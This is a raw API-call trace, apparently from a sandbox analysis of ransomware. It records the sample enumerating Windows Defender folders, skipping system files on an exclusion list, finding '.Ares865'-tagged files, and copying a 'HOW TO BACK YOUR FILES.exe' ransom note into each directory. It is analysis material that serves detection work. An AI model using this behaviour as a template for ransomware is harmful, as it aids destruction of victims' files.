0x120 [0090.577] GetLastError () returned 0x0 [0090.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.577] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.577] CloseHandle (hObject=0x120) returned 1 [0090.577] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.577] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.577] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x63776f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.578] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.578] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.578] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.578] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x63776f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.578] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.578] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.578] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.578] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.578] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c4b8ca0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c4b8ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.578] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.578] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcfc0a7e0, ftCreationTime.dwHighDateTime=0x1d2faf9, ftLastAccessTime.dwLowDateTime=0xcfc0a7e0, ftLastAccessTime.dwHighDateTime=0x1d2faf9, ftLastWriteTime.dwLowDateTime=0x6379d080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x33e60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MpSfc.bin.Ares865", cAlternateFileName="MPSFCB~1.ARE")) returned 1 [0090.578] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.578] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="aoldtz.exe") returned 1 [0090.578] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2=".") returned 1 [0090.578] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="..") returned 1 [0090.578] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="windows") returned -1 [0090.578] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="bootmgr") returned 1 [0090.578] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="temp") returned -1 [0090.578] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="pagefile.sys") returned -1 [0090.578] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="boot") returned 1 [0090.578] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="ids.txt") returned 1 [0090.578] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="ntuser.dat") returned -1 [0090.578] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="perflogs") returned -1 [0090.578] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="MSBuild") returned -1 [0090.578] lstrlenW (lpString="MpSfc.bin.Ares865") returned 17 [0090.578] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*") returned 108 [0090.578] lstrcpyW (in: lpString1=0x2cce4d6, lpString2="MpSfc.bin.Ares865" | out: lpString1="MpSfc.bin.Ares865") returned="MpSfc.bin.Ares865" [0090.578] lstrlenW (lpString="MpSfc.bin.Ares865") returned 17 [0090.578] lstrlenW (lpString="Ares865") returned 7 [0090.578] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.578] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcfc0a7e0, ftCreationTime.dwHighDateTime=0x1d2faf9, ftLastAccessTime.dwLowDateTime=0xcfc0a7e0, ftLastAccessTime.dwHighDateTime=0x1d2faf9, ftLastWriteTime.dwLowDateTime=0x6379d080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x33e60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MpSfc.bin.Ares865", cAlternateFileName="MPSFCB~1.ARE")) returned 0 [0090.578] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.579] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bf0 [0090.579] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Quarantine", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Quarantine") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Quarantine" [0090.579] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f3088 | out: hHeap=0x2b0000) returned 1 [0090.579] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0090.579] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Quarantine") returned 90 [0090.579] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Quarantine" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Quarantine") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Quarantine" [0090.579] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.579] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Quarantine\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\quarantine\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.579] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.579] GetLastError () returned 0x0 [0090.579] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.579] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.580] CloseHandle (hObject=0x120) returned 1 [0090.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.580] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.580] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Quarantine\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.580] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.580] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.580] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.580] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.580] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.580] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.580] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.580] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.580] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c4dee00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.580] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.580] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c4dee00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.580] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.580] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b30 [0090.580] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\LocalCopy", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\LocalCopy") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\LocalCopy" [0090.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0090.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0090.580] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\LocalCopy") returned 89 [0090.580] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\LocalCopy" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\LocalCopy") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\LocalCopy" [0090.580] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.580] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\LocalCopy\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\localcopy\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.581] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.581] GetLastError () returned 0x0 [0090.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.581] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.581] CloseHandle (hObject=0x120) returned 1 [0090.581] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.581] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.581] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\LocalCopy\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.581] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.581] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.581] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.581] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.582] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.582] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.582] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.582] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.582] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c4dee00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.582] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.582] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c4dee00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.582] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.582] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c10 [0090.582] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates" [0090.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0090.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0090.582] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates") returned 98 [0090.582] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates" [0090.582] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.582] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\definition updates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.582] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.583] GetLastError () returned 0x0 [0090.583] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.583] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.583] CloseHandle (hObject=0x120) returned 1 [0090.583] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.583] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.583] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.583] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.583] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.583] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.583] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.583] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.583] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.583] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.583] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.583] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c504f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Backup", cAlternateFileName="")) returned 1 [0090.584] lstrcmpiW (lpString1="Backup", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.584] lstrcmpiW (lpString1="Backup", lpString2="aoldtz.exe") returned 1 [0090.584] lstrcmpiW (lpString1="Backup", lpString2=".") returned 1 [0090.584] lstrcmpiW (lpString1="Backup", lpString2="..") returned 1 [0090.584] lstrcmpiW (lpString1="Backup", lpString2="windows") returned -1 [0090.584] lstrcmpiW (lpString1="Backup", lpString2="bootmgr") returned -1 [0090.584] lstrcmpiW (lpString1="Backup", lpString2="temp") returned -1 [0090.584] lstrcmpiW (lpString1="Backup", lpString2="pagefile.sys") returned -1 [0090.584] lstrcmpiW (lpString1="Backup", lpString2="boot") returned -1 [0090.584] lstrcmpiW (lpString1="Backup", lpString2="ids.txt") returned -1 [0090.584] lstrcmpiW (lpString1="Backup", lpString2="ntuser.dat") returned -1 [0090.584] lstrcmpiW (lpString1="Backup", lpString2="perflogs") returned -1 [0090.584] lstrcmpiW (lpString1="Backup", lpString2="MSBuild") returned -1 [0090.584] lstrlenW (lpString="Backup") returned 6 [0090.584] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\*") returned 100 [0090.584] lstrcpyW (in: lpString1=0x2cce4c6, lpString2="Backup" | out: lpString1="Backup") returned="Backup" [0090.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0090.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2e87c0 [0090.584] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7c50 [0090.584] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c4dee00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.584] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.584] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c504f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Updates", cAlternateFileName="")) returned 1 [0090.584] lstrcmpiW (lpString1="Updates", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.584] lstrcmpiW (lpString1="Updates", lpString2="aoldtz.exe") returned 1 [0090.584] lstrcmpiW (lpString1="Updates", lpString2=".") returned 1 [0090.584] lstrcmpiW (lpString1="Updates", lpString2="..") returned 1 [0090.584] lstrcmpiW (lpString1="Updates", lpString2="windows") returned -1 [0090.584] lstrcmpiW (lpString1="Updates", lpString2="bootmgr") returned 1 [0090.584] lstrcmpiW (lpString1="Updates", lpString2="temp") returned 1 [0090.584] lstrcmpiW (lpString1="Updates", lpString2="pagefile.sys") returned 1 [0090.584] lstrcmpiW (lpString1="Updates", lpString2="boot") returned 1 [0090.584] lstrcmpiW (lpString1="Updates", lpString2="ids.txt") returned 1 [0090.584] lstrcmpiW (lpString1="Updates", lpString2="ntuser.dat") returned 1 [0090.584] lstrcmpiW (lpString1="Updates", lpString2="perflogs") returned 1 [0090.584] lstrcmpiW (lpString1="Updates", lpString2="MSBuild") returned 1 